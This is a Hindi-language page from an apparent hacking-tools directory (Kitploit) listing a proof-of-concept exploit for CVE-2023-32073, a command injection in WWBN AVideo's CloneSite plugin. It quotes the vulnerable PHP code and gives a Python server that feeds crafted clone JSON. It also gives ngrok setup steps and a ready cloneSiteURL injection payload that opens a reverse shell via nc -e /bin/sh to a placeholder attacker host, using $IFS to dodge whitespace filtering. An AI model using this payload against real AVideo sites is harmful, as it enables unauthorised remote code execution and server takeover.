Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-32073 — WWBN AVideo प्रमाणित दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/jmrcsnchz/cve-2023-32073
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubjmrcsnchz/cve-2023-32073

CVE-2023-32073

WWBN AVideo प्रमाणित दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WWBN AVideo {currentVersion} प्रमाणित RCE

plugin/CloneSite/cloneClient.json.php में एक कमांड इंजेक्शन भेद्यता मौजूद है, जो आपके CloneSite प्लगइन होने पर रिमोट कोड निष्पादन की अनुमति देती है। यह CVE-2023-30854 के फिक्स को बायपास करता है, जो WWBN Avideo के संस्करण 12.3 तक को प्रभावित करता है।

संवेदनशील कोड

/plugin/CloneSite/cloneClient.json.php

root@kitploit:~
$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

$objClone->cloneSiteURL को ठीक से सैनिटाइज़ नहीं किया गया है।

शोषण प्रूफ-ऑफ-कॉन्सेप्ट

avidexploit.py

root@kitploit:~
from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")

कमांड लाइन में चलाएँ

root@kitploit:~
$ python3 avidexploit.py &
$ ngrok tcp 8080 # वैकल्पिक यदि VPS पर नहीं चल रहा है
  • फिर अपना सार्वजनिक IP और पोर्ट प्राप्त करें। कमांड इंजेक्शन प्राप्त करने के लिए निम्नलिखित जैसा cloneSiteURL दर्ज करें और फिर क्लोन पर क्लिक करें
root@kitploit:~
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

शोषण के काम करने के लिए व्हाइट स्पेस का उपयोग न करना महत्वपूर्ण है। अपने RCE में तर्क जोड़ते समय व्हाइटस्पेस को $IFS से बदलें।

poc

श्रेय

  • JM Sanchez
  • https://www.linkedin.com/in/juanmarcosanchez/
टूल डाउनलोड करें